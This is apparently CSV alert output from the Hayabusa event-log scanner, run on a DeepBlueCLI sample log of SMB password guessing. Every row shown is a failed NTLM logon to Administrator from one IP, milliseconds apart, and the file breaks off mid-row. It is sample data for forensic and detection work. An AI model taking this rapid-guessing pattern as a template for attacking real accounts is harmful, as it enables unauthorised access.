+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 337h8PHN6Axi0iaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.071 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qGQpWOuzgETfxTgJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:09.108 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oFjlyMAJMI2zIC8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.144 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7exAVz3PlzJQ6Wcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.183 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RuYihjQpt76foAW3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.219 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlPm2vRh9EHN9J6n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.255 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n9jDy3NDDPe7XgyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.291 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtGxqEKOoP6W3w0Y | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.336 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BLqYztXwV80UBez1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.364 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0yki1dEFZrnMLs2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.420 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jbE2z1W1wQgoTDso | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.455 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJmZFXFxiLuWWkMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.500 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x9EPwprgXSJNUFfg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.544 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h0ZjYxZ8K5m5F1vo | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.587 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xSw7OjDv8ldqbm5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.631 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mk0BAdOI210HwPhX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.686 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSwWz57Kvl2XJVUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DLcfSrHT5bSsNnuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.760 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQDkbESps0PXWEUT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.797 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
ZpnyzkXasuyAtdn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.840 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ps9IqJzTliJvzpIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.876 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V7PLb2uRTIY8t123 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.921 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sHAJ9p0QbSRxhvtk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.968 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YRiE1wGrwWAx0feP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Flo4bCVjmlaHz0QS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.061 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: HscUujSzd3Ua7dqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.156 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aIQPTx67aEer51wb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.191 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MqUoXUf7PKIaoDjs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.222 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzeB4DAS1W633tmh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.263 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTtXTrqHoCZMbDLT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.311 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4HVv5PgPhiDW3qcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.344 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: g21VoO45UrIbTuZO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.383 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGpD7AJUTekDmd6Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.423 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OykzTOn7B9THv0cT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.462 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cIYOrBBwX8nFpCzw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.508 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SvnROHLMVnmPfAyy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.547 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5EwJ84H7kXQXzGZz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: 34RLeLWDgLayU3JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.619 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QaXHGUgboODAi5Qu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.659 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlOlZ0m397CsmaeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.699 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N24rSPCI8DsQIPXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.738 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5y2tgoUcs6mFPZm4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.776 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HmFX6MioYqaMumgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.820 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R4HRWlPWPKy1Cicq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.869 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GDUf7wVbHkS9uaPC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.917 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eBX0Lviz6Bv5rGcb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zZwPm9qahLU78FRY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jOVsopykTHNQcYUp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.060 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n8DY7sdDY8nuWdME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:11.105 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTxEVu7mudXEBARZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.148 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ohqvCoOLkFRcqvE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: me8rikVJqcKxvHdq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLqVmqCmHTrD7V8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.269 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ySdyzxvDasHgjq0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.312 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N2auwOc1wemq76n1 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.348 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgK6lHgC5WOBk4kW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.389 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2GG0bKgusKqseQij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpHm7DcOmhq4rkaX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.468 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OX1vVGrE7fJSMEiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.508 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65i7wtyAhL58QrzC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.551 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k8uSVFRTLTB6g1eg | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.592 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ire6VOUMWZQnNjES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.629 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGWnvKUXnbJvRqql | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.666 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBVvrrLf1rnAviKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.704 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NE9atGNBlSLQLLcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.744 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a0M5EaAXziu07hOH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.784 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
PM1mwxqI7yVgoK2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.836 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPqnpvetHXdThxYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.879 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gthbVQMJ7UD2QS7H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwwJXCoC3gMDoDn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.068 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ilNNoVbZpyhtsNkV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.109 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eNY0lv9IglfHP34d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.167 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: BjSeQciwy17L7raV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.208 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wycE1fIsmPq9zaMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.241 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5z1spxImm2ZlGOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.294 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dg7o4GCET1bJrlEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.376 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E7Db3OLA0XPXL1B4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.417 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uoqx5iPRp2tfYYos | IP Addr: 192.168.198.149 | AuthPackage: 